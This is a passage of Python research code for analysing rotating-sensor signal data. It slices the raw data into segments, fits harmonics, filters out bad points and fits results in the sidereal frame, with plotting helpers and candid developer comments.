{0}\".format(sigWindow))\r\n indxL= sliceSorted(rawAmp.t, t_0=trigTimes + secs2sd(sigWindow.offset), delta_t=secs2sd(sigWindow.duration)) #indices of the points between each rotation\r\n #Now we 'regularize' it, making sure there's the same number of points in each slice (needed to make things faster later)\r\n NptsL=[ind.size for ind in indxL.ravel() if ind.size>1] #2 pts may be the minimum we can work with?\r\n\r\n minPtsI=argmin(NptsL)\r\n maxPts=max(NptsL)\r\n k=0;\r\n while NptsL[minPtsI]< 0.9*maxPts:\r\n vprint(\"A cut was too short: {0} vs {1}\".format(NptsL[minPtsI], maxPts)) \r\n NptsL.pop(minPtsI)\r\n minPtsI=argmin(NptsL)\r\n k+=1;\r\n if k>=20:\r\n print(\"Too mny short cuts. There's probably a segment of bad data\")\r\n #raise ValueError(\"Too mny short cuts. There's probably a segment of bad data\")\r\n minPts=NptsL[minPtsI]\r\n \r\n\r\n indxLReg=array([ind[:minPts] if ind.size>=minPts else -1*ones(minPts,dtype='i8') for ind in indxL.ravel()])\r\n \r\n indxLReg=indxLReg.reshape(indxL.shape[0], indxL.shape[1], minPts)\r\n\r\n rawAmpOut=RawData(t= rawAmp.t[indxLReg], sig=rawAmp.sig[indxLReg])\r\n rawAmpOut.sig[indxLReg==-1]=nan\r\n rawAmpOut.t[indxLReg==-1]=nan\r\n return rawAmpOut\r\n \r\ndef process_raw(rawAmp):\r\n def window_mean(arr, axis=0):\r\n win=windows.kaiser(arr.shape[axis], 10)\r\n win/=win.sum()\r\n #This isn't right\r\n return sum(arr*win[newaxis,newaxis,:],axis=axis)\r\n \r\n funcs_on_cutsL=[np.mean, lambda vals, **kwargs: np.std(vals, **kwargs)/sqrt(np.size(vals))]\r\n T=rawAmp.t.mean(axis=-1)\r\n Y=window_mean(rawAmp.sig, axis=-1) \r\n Err=np.std(rawAmp.sig,axis=-1)\r\n #Y, Err= processedL[0:]\r\n\r\n #rawSig=array([y[ind[:minPts]] if ind.size>=minPts else zeros(minPts)*nan for ind in indxL.ravel()])\r\n #rawSig=rawSig.reshape(indxL.shape[0], indxL.shape[1], minPts)\r\n #rawSigF=fft(rawSig)\r\n return PointData(t=T, sig=Y, err=Err,chi2=None,theta=None)\r\n\r\ndef process_points(ptLabAngle, pointAmp, cutAmp, stPtChi2Lim=50):\r\n \"\"\" Turn groups of points into sequences- except currently we go directly from a a group of 'cuts' (i.e. the cut-out raw data) to one value for each sequences.\r\n \"\"\"\r\n vprint(\"chi2 limit on string points: {}\".format(stPtChi2Lim))\r\n pointAmp=None\r\n ptT=mean(cutAmp.t, axis=-1)\r\n ptErr=std(cutAmp.sig, axis=-1)\r\n if ptLabAngle.shape[0] > cutAmp.sig.shape[0]:\r\n if ptLabAngle.shape[0]==cutAmp.sig.shape[0]+1:\r\n ptLabAngle=ptLabAngle[:-1]\r\n else:\r\n raise ValueError(\"angles shouldn't be more than 1 sequence bigger than the dataset (can happen if only part of a sequence is included). But here, ptLabAngle.shape[0] is {0} and cutAmp.shape[0] is {1}\".format(ptLabAngle.shape[0], cutAmp.sig.shape[0]))\r\n \r\n # Process each group of sequences\r\n outL=zip(*[mgStringHarmonics(th, seq, None, chi2Filter=inf) for th,seq, err in zip(ptLabAngle, cutAmp.sig, ptErr)])\r\n if stPtChi2Lim is not inf:\r\n #origSigA=array(outL[1])\r\n chi2temp=nanmean(array(outL[3]), axis =-1).squeeze()\r\n smoothedChi2=MT.running_nanmedian(chi2temp, 100)\r\n outL=zip(*[mgStringHarmonics(th, seq, None, chi2Filter=stPtChi2Lim*smChi2) for th,seq, err, smChi2 in zip(ptLabAngle, cutAmp.sig, ptErr, smoothedChi2)])\r\n labAngle, seqSig, seqErr, seqChi2 = [array(p) for p in outL] #Array-ify the results\r\n\r\n #Old stuff for doing harmonicsFit\r\n #th0s,h1,cov1=zip(*[getHarmonicsFit(th, seq, err) for th,seq, err in zip(theta[:-1], ptSig, ptErr )])\r\n #h1=array(h1)\r\n #cov1=array(cov1)\r\n #covAs=cov1[:,0].squeeze()\r\n #th0s=array(th0s)\r\n #chi2=None \r\n\r\n seqT=nanmean(ptT, axis=1)\r\n seqT=seqT[:,newaxis, newaxis]*ones(seqSig.shape) #make T's the same shape as the rest\r\n return CorrelationData(t=seqT, sig=seqSig, err=seqErr, chi2=seqChi2, theta=labAngle)\r\n\r\ndef filterBySensors(cutAmp, sensDataL=[], bView=True):\r\n #bView=True\r\n if not sensDataL:\r\n vprint(\"No sensor filtering\")\r\n return cutAmp\r\n\r\n Npts=cutAmp.sig.size/(cutAmp.sig.shape[-1])\r\n badM=zeros(Npts, dtype=bool) #Mask for 'bad' data\r\n if bView:\r\n fig, axL=subplots(len(sensDataL)+1, 1, sharex=True)\r\n #vprint(\"Filtering out bad points using sensors {0}\".format(sensorNameL))\r\n for k, sD in enumerate(sensDataL):\r\n #sDTs, [_, sDCutSig, sDCutErr], sDCutIndxL = sliceReduceData( sD[0], sD[1], trigTimes + secs2sd(sigWindow.offset), secs2sd(sigWindow.duration) ) \r\n badSDM, xSM=MT.findOutliers(sD.sig.ravel(), windowLen=70, sigmas=3, bReturnMeanLine=True)\r\n badM= badM | badSDM\r\n\r\n if bView:\r\n axL[k+1].plot(sD.t.ravel(), sD.sig.ravel(),'.')\r\n axL[k+1].plot(sD.t.ravel()[badSDM], sD.sig.ravel()[badSDM],'o')\r\n #axL[k+1].plot(sDTs.ravel()[badSDM], sDCutSig.ravel()[badSDM],'o')\r\n if bView:\r\n sigA=cutAmp.sig.mean(axis=-1)\r\n axL[0].plot(sD.t.ravel(), sigA.ravel(),'.')\r\n axL[0].plot(sD.t.ravel()[badM], sigA.ravel()[badM],'.') \r\n\r\n\r\n \r\n filtCutAmp=cutAmp._replace(sig=cutAmp.sig.copy())\r\n filtCutAmp.sig.reshape(-1,filtCutAmp.sig.shape[-1])[badM]=nan\r\n return filtCutAmp\r\n#def process_sequences(sT, sSig, sErr, sLabAngles):\r\ndef process_sequences(corrAmp):\r\n '''Process sequence values, sSig, into final numbers\r\n '''\r\n sT,sSig, sErr, sChi2, sLabAngles=[s[:,0,:] for s in corrAmp]\r\n if sSig.size==0:\r\n return None\r\n #sErr*sqrt(sChi2)\r\n #winI=20\r\n #chi2=nanmedian(corrAmp.chi2[I]*(corrAmp.Neff[I]./stats.chi2.ppf(0.5, corrAmp.Neff)), axis=0) \r\n #chisq1=nanmedian(v1(w,3,:).*(v1(w,4,:)./chi2inv(.5,v1(w,4,:))),1);\r\n #v1(j,2,:)=v1(j,2,:).*sqrt(chisq1);\r\n \r\n if not iterable(sLabAngles) or len(sLabAngles)==1 or unwrap(sLabAngles%pi).sum()<pi:#(maaaaaybeee)\r\n vprint(\"no lab angles given for sequence data in 'process_sequences'. Doing something dodgy that probably isn't right to make up for it\")\r\n if sSig:\r\n \r\n labSig= average(sSig, weights=sErr**2)\r\n else:\r\n labSig=[];labErr=[];labAngles=[]\r\n labAmp=LabSetData(t=mean(sT), sig=labSig, err=None, chi2=None, labTheta=squeeze(labAngles))\r\n else:\r\n if sErr.ndim>2:\r\n sErr=vstack([sErr[:,0,0], sErr[:,1,1]]).T\r\n [labAngles, labSignal, labErr, labChi2]=zip(*getHarmonicsFit(sLabAngles, sSig, sErr))[0] #This returns two angles, and we'll limit ourselves to the first harmonic\r\n labAmp=LabSetData(t=mean(sT)*ones(len(labAngles)),\r\n sig=array(labSignal), \r\n err=sqrt(diag(labErr)),\r\n chi2=labChi2,\r\n labTheta=array(labAngles))\r\n #labAmp=[array(labAmpTemp[0]), array(labAmpTemp[1]), sqrt(diag(labAmpTemp[2]))]\r\n ######SIDEREAL-FRAME FITTING##########\r\n #LV0=zip(*getHarmonicsFit(sT*2*pi, sSig, sErr))[0] #First harmonic only\r\n if sLabAngles is None:\r\n print(\"Not checked if it works when you don't give lab angles for sequences... we'll presume all measuremetns are taken in the same lab-orientation, but beware!\")\r\n [sidAngles, sidSignal, sidErr, sidChi2]=zip(*getHarmonicsFit(sT*2*pi, sSig, sErr))[0]\r\n else:\r\n [sidAngles, sidSignal, sidErr, sidChi2]=zip(*getHarmonicsFit(sT*2*pi + sLabAngles, sSig, sErr))[0]\r\n\r\n sidFitDat=SiderealFitData(t=mean(sT)*ones(len(labAngles)),\r\n #sig=array(sidSignal), err=sqrt(diag(sidErr)),\r\n sig=array(sidSignal), err=sidErr,\r\n labTheta=array(sidAngles), chi2=sidChi2, sidTheta=None, meta=None)\r\n #Repeat this for lab angles, and other sideral angles\r\n #sidAmp=[array(sidAmpTemp[0]), array(sidAmpTemp[1]), sqrt(diag(sidAmpTemp[2]))]\r\n return labAmp, sidFitDat\r\n\r\ndef process_continuous_raw(sigRaw, phaseRef, rotationRate, bPlot=False, th0FGz=2.87):\r\n #split up data\r\n\r\n #iterate through data\r\n #if phaseRef is a rawSig tuple (e.g. flux-gate), then fit it\r\n #else we'll assume it's time-theta pairs, in which case we'll also just interpolate \r\n\r\n #Fit the raw signal to a sin/cos pair plus some polynomial terms\r\n tOffs=sigRaw.t[0]\r\n #K=3600*24\r\n tSplit, sSplit = MT.splitAtGaps(sd2secs(sigRaw.t-tOffs), sigRaw.sig)\r\n tMedSplit, fgSplit = MT.splitAtGaps(sd2secs(phaseRef.t-tOffs), phaseRef.sig)\r\n gdInds=[~isnan(s) for s in sSplit]\r\n tSplit=[t[gdI] for t, gdI in zip(tSplit, gdInds)]\r\n sSplit=[s[gdI] for s, gdI in zip(sSplit, gdInds)]\r\n #plot(sig.t, MT.smooth(sig.sig,500, window='hanning'))\r\n\r\n fp4L=[]\r\n err4L=[]\r\n chi2L=[]\r\n tL=[]\r\n fgFitL=[]\r\n phaseL=[]\r\n thL=[]\r\n k=0\r\n for t, s, tfg, sfg in zip(tSplit, sSplit, tMedSplit, fgSplit):\r\n if t.size<2:\r\n continue\r\n midT=t[t.size/2]\r\n cutOffSecs=0\r\n t-=midT\r\n I=t.searchsorted(t[-1]-cutOffSecs)\r\n t=t[:I]\r\n s=s[:I]\r\n\r\n tfg-=midT\r\n I=tfg.searchsorted(tfg[-1]-cutOffSecs)\r\n tfg=tfg[:I]\r\n sfg=sfg[:I]\r\n\r\n try:\r\n p0=[ rotationRate, 0.03262361, 0.03052155, 5.41955202]\r\n gdI=~isnan(sfg)\r\n fFG=lambda t, f, a1, a2, offs: a1*sin(2*pi*f*t) + a2*cos(2*pi*f*t) + offs\r\n fpFG, err=curve_fit(fFG, tfg[gdI], sfg[gdI],p0=p0)\r\n fgFitL.append(fpFG)\r\n\r\n #figure()\r\n #plot(tfg,sfg)\r\n #plot(tfg, fFG(tfg, *fpFG))\r\n #figure()\r\n #plot(tfg, MT.smooth(sfg-fFG(tfg, *fpFG), 10))\r\n\r\n\r\n th0=arctan2(fpFG[1], fpFG[2]) # The angle where the fluxgate shows a minimum deviationF\r\n phaseL.append(th0)\r\n\r\n thfg=2*pi*fpFG[0]*tfg-th0%(2*pi)-2*pi\r\n #thfg=2*pi*(fpFG[0]-0.005)*tfg-th0%(2*pi)-2*pi\r\n th=interp(t, tfg,thfg)\r\n\r\n f4=lambda th, a1x, a1y, a2x, a2y, a3x,a3y, p1, p2, p3, p4, p5, offs: a1x*sin(th) + a1y*cos(th) + a2x*sin(2*th) + a2y*cos(2*th)+ a3x*sin(3*th) + a3y*cos(3*th)+ p1*th +p2*th**2 + p3*th**3 + p4*th**4 + p5*th**5 + offs\r\n\r\n p0=[0.1, 0.1, 1e-5, 1e-7, 1e-9, 0.08]\r\n\r\n sampleRate=1./median(diff(t))\r\n #print(\"Sample rate is {}\".format(sampleRate))\r\n Nds=round(sampleRate)\r\n\r\n p0=[0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 1e-5, 1e-7, 1e-9, 1e-9, 1e-9, 0.08]\r\n th_ds, s_ds=MT.downsample_npts(th,Nds), MT.downsample_npts(s, Nds)\r\n if th_ds.size <= len(p0) +1:\r\n raise RuntimeError(\"not enough data here\")\r\n fp4, err4=curve_fit(f4, th_ds, s_ds, p0=p0)\r\n\r\n chi2= sum((f4(th, *fp4)-s)**2)/(th.size-len(p0))\r\n #fp, err=curve_fit(f, th,s,p0=p0)\r\n #fp2, err2=curve_fit(f2, th, s,p0=p0)\r\n #figure()\r\n #plot(t,MT.smooth(s,Nds, window='hanning'))\r\n #plot(t, f(th, *fp))\r\n #plot(t, f2(th, *fp2))\r\n #print(\"fp4: {0}\".format(fp4))\r\n fp4L.append(fp4)\r\n chi2L.append(chi2)\r\n #err4L.append(sqrt(diag(err4)))\r\n err4L.append(err4)\r\n tL.append(midT)\r\n thL.append(th)\r\n\r\n except RuntimeError:\r\n print(\"No fit at {}\".format(midT))\r\n\r\n\r\n fp4A=array(fp4L)\r\n fpA=fp4A[:,:2]\r\n fp2A=fp4A[:,2:4]\r\n fp3A=fp4A[:,4:6]\r\n err4A=array(err4L)\r\n errA=err4A[:,:2,:2]\r\n err2A=err4A[:,2:4,2:4]\r\n err3A=err4A[:,4:6,4:6]\r\n\r\n chi2A=array(chi2L)\r\n\r\n\r\n tA=array(tL)\r\n if bPlot:\r\n figure()\r\n errorbar(tA, fpA[:,0], errA[:,0],fmt='.')\r\n errorbar(tA, fpA[:,1], errA[:,1],fmt='.')\r\n title(\"1st harmonic\")\r\n figure()\r\n errorbar(tA, fp2A[:,0], err2A[:,0],fmt='.')\r\n errorbar(tA, fp2A[:,1], err2A[:,1],fmt='.')\r\n title('2nd Harmonic')\r\n\r\n figure()\r\n plot(tA, [p[0] for p in fgFitL])\r\n figure()\r\n plot(tA, [p[1] for p in fgFitL])\r\n plot(tA, [p[2] for p in fgFitL])\r\n figure()\r\n plot(tA, phaseL)\r\n N=tA.size\r\n tSeq=tile(secs2sd(tA)+tOffs, [2,2,1]).T\r\n sigSeq=hstack( [fpA[:,newaxis, :2], fp2A[:,newaxis,:2], fp3A[:,newaxis,:2]] )\r\n errSeq=hstack( [errA[:,newaxis, :2], err2A[:,newaxis,:2], err3A[:, newaxis,:2]] )\r\n #chi2Seq=hstack( [chi2_1A[:,newaxis], chi2_2A[:,newaxis]] )\r\n chi2Seq=hstack( [chi2A[:,newaxis], chi2A[:,newaxis], chi2A[:,newaxis]] )\r\n chi2Seq=dstack([chi2Seq, chi2Seq])\r\n sgn=-1 if rotationRate<0 else 1\r\n thetaSeq1=vstack( [zeros(N), zeros(N), zeros(N)])\r\n #thetaSeq2=vstack( [sgn*ones(N)*pi/2, sgn*ones(N)*pi/4, sgn*ones(N)*pi/6] )\r\n thetaSeq2=vstack( [sgn*ones(N)*pi/2, sgn*ones(N)*pi/2, sgn*ones(N)*pi/2] )\r\n #thetaSeq1=vstack( [zeros(N), ones(N)*pi/2])\r\n #thetaSeq2=vstack( [zeros(N), ones(N)*pi/4])\r\n\r\n #thetaSeq2=vstack( [ones(N)*pi/2, ones(N)*pi/4])\r\n thetaSeq=dstack([thetaSeq1.T, thetaSeq2.T])\r\n seqAmp=CorrelationData(\r\n t=tSeq.copy(),\r\n sig=sigSeq.copy(),\r\n err=errSeq.copy(),\r\n chi2=chi2Seq.copy(),\r\n theta=thetaSeq.copy() + th0FGz, #th0FGz is the orientation of the FGz correlation\r\n )\r\n return seqAmp\r\n\r\n\r\ndef split_and_process_sequences(seqAmp):\r\n seqT, seqSig, seqErr, seqChi2, labAngle=seqAmp\r\n def seqFiltAngle(seqAmp, th):\r\n mask=nearby_angles(seqAmp.theta[:,0,0], th, 0.1)\r\n return CorrelationData(*[s[mask] for s in seqAmp])\r\n seqAmp1=CorrelationData(seqAmp.t, *[d[:,0,0].squeeze() for d in seqAmp[1:]])\r\n seqAmp2=CorrelationData(seqAmp.t, *[d[:,0,1].squeeze() for d in seqAmp[1:]])\r\n\r\n\r\n\r\n thetaRef, xI, yI=group_by_axis(seqAmp1.theta) \r\n \r\n seqAmp1_0=CorrelationData(*[d[xI] for d in seqAmp1])\r\n seqAmp1_90=CorrelationData(*[d[yI] for d in seqAmp1])\r\n\r\n #seqAmp1_0=seqAmp1_0._replace(theta= seqAmp1_0.theta*sin(seqAmp1.theta[xI]-thetaRef))\r\n #seqAmp1_90=seqAmp1_90._replace(theta=seqAmp1_90.theta*cos(seqAmp1.theta[yI]-thetaRef))\r\n\r\n #seqSig1_0=seqSig1[xI]*sin(labAngle1[xI]-thetaRef)\r\n #seqErr1_0=seqErr1[xI]\r\n #seqSig1_90=seqSig1[yI]*cos(labAngle1[yI]-thetaRef)\r\n #seqErr1_90=seqErr1[yI]\r\n #seqT_0=seqT[xI]\r\n #seqT_90=seqT[yI]\r\n\r\n #seqAmp_0=CorrelationData([d[xI] for d in \r\n #seqAmp_0CorrelationData(t=seqT_0, sig=seqSig1_0, err=seqErr1_0, chi2=seqChi21[xI], labTheta=labAngle1[xI], None)\r\n\r\n seqAmpL=(seqAmp1_0, seqAmp1_90, seqAmp1)\r\n ampL=[ process_sequences(sAmp) for sAmp in seqAmpL ]\r\n\r\n #labAmp1_0, sidAmp1_0=process_sequences(seqAmp1_0)\r\n #labAmp1_90, sidAmp1_90=process_sequences(seqAmp1_90)\r\n #labAmp, sidAmp=process_sequences(seqAmp1)\r\n #labAmp0, sidAmp0=process_sequences(seqT_0, seqSig1_0, seqErr1_0, thetaRef)\r\n #labAmp90, sidAmp90=process_sequences(seqT_90, seqSig1_90, seqErr1_90, thetaRef+pi/2)\r\n #labAmp, sidAmp=process_sequences(seqT, seqSig1, seqErr1, labAngle1)\r\n\r\n #labAmpAlt= [labAmp0, labAmp90]\r\n #NS, EW=average([sidAmp0[1], sidAmp90[1][::-1]], axis=0, weights=[sidAmp[2]**2, sidAmp90[2][::-1]])\r\n #NS_err, EW_err = sqrt(sidAmp0[2]**2 + sidAmp90[2][::-1]**2)/2.\r\n #sidAmpAlt=[ (NS, EW), (NS_err, EW_err)] \r\n \r\n return zip(*ampL) + [seqAmpL] # --> (labAmps, sidAmps, seqAmps)\r\n #return [ (labAmp, labAmpAlt), (sidAmp, sidAmpAlt)]\r\n\r\ndef view_raw(rawAmp0, cutAmpL, trigTimes, cutAmpLNames=None, figName=None):\r\n if figName is not None:\r\n figDontReplace(figName + ' -raw')\r\n else:\r\n figDontReplace()\r\n gs=GridSpec(2,3)\r\n ax1=subplot(gs[0,:])\r\n ax2=subplot(gs[1,0])\r\n ax3=subplot(gs[1,1])\r\n ax4=subplot(gs[1,2])\r\n\r\n ax1.plot(rawAmp0.t, rawAmp0.sig)\r\n for cutAmp, name in zip(cutAmpL, cutAmpLNames):\r\n ax1.plot(cutAmp.t.ravel(), cutAmp.sig.ravel(), label=name, markersize=5)\r\n\r\n #ax1.vlines(trigTimes, rawAmp0.sig.min(), rawAmp0.sig.max(), linestyles='dotted')\r\n ax1.set_title('raw signal')\r\n ax1.set_xlabel('sd')\r\n ax1.legend()\r\n #cutAmp.sigF=fft(cutAmp.sig- nanmean(cutAmp.sig, axis=-1)[:,:,newaxis])\r\n cutAmpSigF, fax=MF.rPSD(cutAmp.sig- nanmean(cutAmp.sig, axis=-1)[:,:,newaxis], t=cutAmp.t[0][0])\r\n ax2.plot(fax/3600/24, nanmean(nanmean(abs(cutAmpSigF), axis=0), axis=0))\r\n ax2.set_title('PSD')\r\n ax2.set_xlabel('Hz')\r\n\r\n if 0:\r\n ax3.hist(nonnan(nanstd(cutAmp.sig, axis=-1).ravel()), bins=30)\r\n ax3.set_title('std')\r\n\r\n ttemp=cutAmp.t[0][0]\r\n slopes=[polyfit(ttemp, y, 1)[0] for y in cutAmp.sig.reshape(-1, cutAmp.sig.shape[-1]) if not all(isnan(y))]\r\n ax4.hist(nonnan(slopes), bins=30)\r\n ax4.set_title('slopes')\r\n\r\ndef view_correlation_filtering(pointAmpInit, correlationAmpInit, pointAmpFilt, correlationAmpFilt, figName=None, sharexAx=None):\r\n if figName is None:\r\n figDontReplace()\r\n else:\r\n figDontReplace(figName+' -Corr diff')\r\n gs=GridSpec(3,1)\r\n\r\n pointAxs=MT.plot_errorbar_and_hist(pointAmpInit.t.ravel(), pointAmpInit.sig.ravel(), pointAmpInit.err.ravel(), subplotSpec=gs[0], sharexs=[sharexAx,None])\r\n pointAxs=MT.plot_errorbar_and_hist(pointAmpFilt.t.ravel(), pointAmpFilt.sig.ravel(), \r\n pointAmpFilt.err.ravel(), *pointAxs\r\n )\r\n\r\n thetaRef, xI, yI=group_by_axis(correlationAmpInit.theta[:,0,:].ravel()) \r\n corAxs=MT.plot_errorbar_and_hist(correlationAmpInit.t.ravel()[xI], \r\n correlationAmpInit.sig.ravel()[xI]*sin(correlationAmpInit.theta.ravel()[xI]),\r\n correlationAmpInit.err.ravel()[xI], subplotSpec=gs[1], sharexs=[pointAxs[0], None]\r\n )\r\n MT.plot_errorbar_and_hist(correlationAmpInit.t.ravel()[yI], correlationAmpInit.sig.ravel()[yI]*cos(correlationAmpInit.theta.ravel()[yI]), correlationAmpInit.err.ravel()[yI], *corAxs)\r\n\r\n thetaRef, xI, yI=group_by_axis(correlationAmpFilt.theta[:,0,:].ravel()) \r\n corAxs=MT.plot_errorbar_and_hist(correlationAmpFilt.t.ravel()[xI], \r\n correlationAmpFilt.sig.ravel()[xI]*sin(correlationAmpFilt.theta.ravel()[xI]),\r\n correlationAmpFilt.err.ravel()[xI], *corAxs\r\n )\r\n MT.plot_errorbar_and_hist(correlationAmpFilt.t.ravel()[yI], correlationAmpFilt.sig.ravel()[yI]*cos(correlationAmpFilt.theta.ravel()[yI]), correlationAmpFilt.err.ravel()[yI], *corAxs)\r\n\r\n chi2Axs=MT.plot_scatter_and_hist(correlationAmpInit.t.ravel(), correlationAmpInit.chi2.ravel(), subplotSpec=gs[2], sharexs=[pointAxs[0],None], scatD={'c':'b'})\r\n chi2Axs=MT.plot_scatter_and_hist(correlationAmpFilt.t.ravel(), correlationAmpFilt.chi2.ravel(), *chi2Axs, scatD={'c':'g'})\r\n\r\ndef view_correlations(pointAmp, correlationAmp, figName=None, sharexAx=None, correlationSigComp=None ):\r\n if figName is None:\r\n figDontReplace()\r\n else:\r\n figDontReplace(figName+' -Corr')\r\n gs=GridSpec(3,1)\r\n gs=GridSpec(5,1)\r\n\r\n if correlationSigComp is not None and 1:\r\n #refNonNanM=~isnan(correlationSigComp)\r\n\r\n diffI=where( (correlationSigComp[:,0].ravel()!=correlationAmp.sig[:,0].ravel()) & (~isnan(correlationSigComp[:,0].ravel())))[0]\r\n #diffMask=correlationSigComp[refNonNanM]!=correlationAmp.sig[refNonNanM]\r\n\r\n #diffI=arange(correlationSigComp.size)[refNonNanM][diffMask.ravel()]\r\n #diffAmp[diffAmp==0]=nan\r\n #diffMask=~isnan(diffAmp.ravel())\r\n #pdb.set_trace()\r\n \r\n pointAxs=MT.plot_errorbar_and_hist(pointAmp.t.ravel(), pointAmp.sig.ravel(), pointAmp.err.ravel(), subplotSpec=gs[0], sharexs=[sharexAx,None])\r\n\r\n correlationAmp=rotate_sequence_amps(correlationAmp)\r\n thetaRef, xI, yI=group_by_axis(correlationAmp.theta[:,0,:].ravel()) \r\n err1h=sqrt(vstack([correlationAmp.err[:,0,0,0],correlationAmp.err[:,0,1,1]]).T)\r\n\r\n corAxs=MT.plot_errorbar_and_hist(correlationAmp.t[:,0].ravel()[xI], \r\n correlationAmp.sig[:,0].ravel()[xI]*cos(correlationAmp.theta[:,0].ravel()[xI]), \r\n err1h.ravel()[xI], \r\n subplotSpec=gs[1], sharexs=[pointAxs[0], None])\r\n MT.plot_errorbar_and_hist(correlationAmp.t[:,0].ravel()[yI], correlationAmp.sig[:,0].ravel()[yI]*sin(correlationAmp.theta[:,0].ravel()[yI]), err1h.ravel()[yI], *corAxs)\r\n\r\n #pdb.set_trace()\r\n if correlationSigComp is not None:\r\n #corAxs[0].plot(correlationAmp.t.ravel()[diffMask==xI], diffAmp.ravel()[diffMask==xI], 'rx')\r\n xdI=intersect1d(xI, diffI)\r\n ydI=intersect1d(yI, diffI)\r\n if xdI.size:\r\n corAxs[0].plot(correlationAmp.t[:,0].ravel()[xdI], correlationSigComp[:,0].ravel()[xdI]*cos(correlationAmp.theta[:,0].ravel()[xdI]), 'rx')\r\n #corAxs[0].plot(correlationAmp.t.ravel()[diffMask==yI], diffAmp.ravel()[diffMask==yI], 'yx')\r\n if ydI.size:\r\n corAxs[0].plot(correlationAmp.t[:,0].ravel()[ydI], correlationSigComp[:,0].ravel()[ydI]*sin(correlationAmp.theta[:,0].ravel()[ydI]), 'yx')\r\n\r\n\r\n ax=subplot(gs[2])\r\n #ax.plot(correlationAmp.t[:,0].ravel()[yI], correlationAmp.chi2[:,0].ravel()[yI],'o')\r\n #ax.plot(correlationAmp.t[:,0].ravel()[xI], correlationAmp.chi2[:,0].ravel()[xI],'o')\r\n chi21hAxs=MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel()[xI], correlationAmp.chi2[:,0].ravel()[xI], subplotSpec=gs[2])\r\n MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel()[yI], correlationAmp.chi2[:,0].ravel()[yI], *chi21hAxs)\r\n if correlationAmp.t.shape[1]>1: #2H\r\n err2h=sqrt(vstack([correlationAmp.err[:,1,0,0],correlationAmp.err[:,1,1,1]]).T)\r\n thetaRef, xI2, yI2=group_by_axis(2*correlationAmp.theta[:,1,:].ravel()) \r\n cor2hAxs=MT.plot_errorbar_and_hist(correlationAmp.t[:,1].ravel()[xI2], correlationAmp.sig[:,1].ravel()[xI2]*cos(2*correlationAmp.theta[:,1].ravel()[xI2]), err2h.ravel()[xI2], subplotSpec=gs[3], sharexs=[pointAxs[0], None])\r\n\r\n MT.plot_errorbar_and_hist(correlationAmp.t[:,1].ravel()[yI2], correlationAmp.sig[:,1].ravel()[yI2]*sin(2*correlationAmp.theta[:,1].ravel()[yI2]), err2h.ravel()[yI2], *cor2hAxs)\r\n subplot(gs[4]).plot(correlationAmp.t[:,1].ravel(), correlationAmp.chi2[:,1].ravel(),'o')\r\n\r\n #chi2Axs=MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel(), correlationAmp.chi2[:,0].ravel(), subplotSpec=gs[2], sharexs=[pointAxs[0],None])\r\n\r\n if not MT.nearby_angles(thetaRef, 0, 0.1):\r\n corAxs[0].set_title('Reference angle: {0}'.format(thetaRef/pi*180))\r\n #tight_layout()\r\n \r\ndef view_sidereal(seqTup, sidFitTup, labFrameTup=None):\r\n \"\"\"Not functional anymore\r\n \"\"\"\r\n figure()\r\n fx=lambda th, ax: ax*sin(th)\r\n fy=lambda th, ay: ay*cos(th)\r\n f=lambda th, ax, ay: ax*sin(th) + ay*cos(th)\r\n\r\n gs=GridSpec(2,1)\r\n sigAxs=MT.plot_errorbar_and_hist(seqTup.t.ravel(), seqTup.sig.ravel(), seqTup.err.ravel(), subplotSpec=gs[0])\r\n if seqTup.chi2 is not None:\r\n chiAxs=MT.plot_scatter_and_hist(seqTup.t, seqTup.chi2, gs[1])\r\n chiAxs[0].set_title(r'$\\chi^2$')\r\n\r\n\r\n sigRot=MT.rotMat2d(-sidFitTup.labTheta[0]).dot(sidFitTup.sig)\r\n errRot=abs(MT.rotMat2d(-sidFitTup.labTheta[0]).dot(sidFitTup.err)) #This is very fragile- should do full covariance in here.\r\n sigAxs[0].plot(seqTup.t, f(2*pi*seqTup.t + 0*sidFitTup.labTheta[0], *sidFitTup.sig),\r\n label=\"$X$:{:.3} $\\pm$ {:.3}, $Y$:{:.3} $\\pm$ {:.3}\".format(\r\n sigRot[0,0], errRot[0,0], sigRot[0,1], errRot[0,1])\r\n )\r\n sigAxs[0].legend()\r\n sigAxs[0].set_title('Sidereal Signal (lab: $S_{0:.3}={1:.3} \\pm {2:.3}$, $S_{3:.3}= {4:.3} \\pm {5:.3}$'.format(\r\n labFrameTup.labTheta[0]/pi*180, labFrameTup.sig[0], labFrameTup.err[0], \r\n labFrameTup.labTheta[1]/pi*180, labFrameTup.sig[1], labFrameTup.err[1] ))\r\n \r\n #Could also do another here if we're fitting both\r\n #bothAx1.legend()\r\n\r\n if 0:\r\n for T, A, LV in ([seqT_0, seqSig1_0, sidAmp0], [seqT_90, seqSig1_90, sidAmp90]):\r\n if len(A)>3:\r\n axLV.plot(T, f(2*pi*T+ LV[0][0] -0*thetaRef, *LV[1] ), label=\"$_X$:{:.3} $\\pm$ {:.3}, $_Y$:{:.3} $\\pm$ {:.3}\".format(LV[1][0], sqrt(LV[2][0]), LV[1][1], sqrt(LV[2][1])))\r\n else:\r\n vprint(\"Need at least 3 sequence points\")\r\n axLV.text( 0.5, 0.05, r'$\\theta_0 = {:.3}$'.format(thetaRef/pi*180), bbox=dict(facecolor='grey', alpha=0.1), transform=axLV.transAxes, fontsize=16)\r\n axLV.legend(loc=0)\r\n\r\ndef combine_angle_amps(ampL, plot=False):\r\n\r\n ampL=[amp for amp in ampL if amp is not None]\r\n ts = [ sAmp.t for sAmp in ampL]\r\n if ampL:\r\n #Might not rotate in this case, but just in case\r\n (ths, ys, covs)= zip(*[ MT.rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in ampL if sAmp is not None])\r\n ys=array(ys)\r\n if covs[0].ndim>1:\r\n errs=array([sqrt(cov.diagonal()) for cov in covs]) #cheat and throw away off-diagonals\r\n else:\r\n errs=array(covs)\r\n\r\n\r\n ts=array(ts)\r\n if ts.ndim < ys.ndim:\r\n ts=tile(ts[:,newaxis],2)\r\n mn, wEr, apparentUnc, chi2= MT.weightedStats(ys, 1./(errs**2), axis=0, bReturnChi2=True)\r\n varSclFact=where( (chi2>1.) & (~isinf(chi2)), chi2, 1.)\r\n #calcedUnc=sqrt(nansum(errs**2,axis=0)/sum(~isnan(errs))**2)\r\n calcedUnc=1/sqrt(nansum(1/errs**2,axis=0))\r\n combAmp=SiderealFitData(mean(ts), mn, 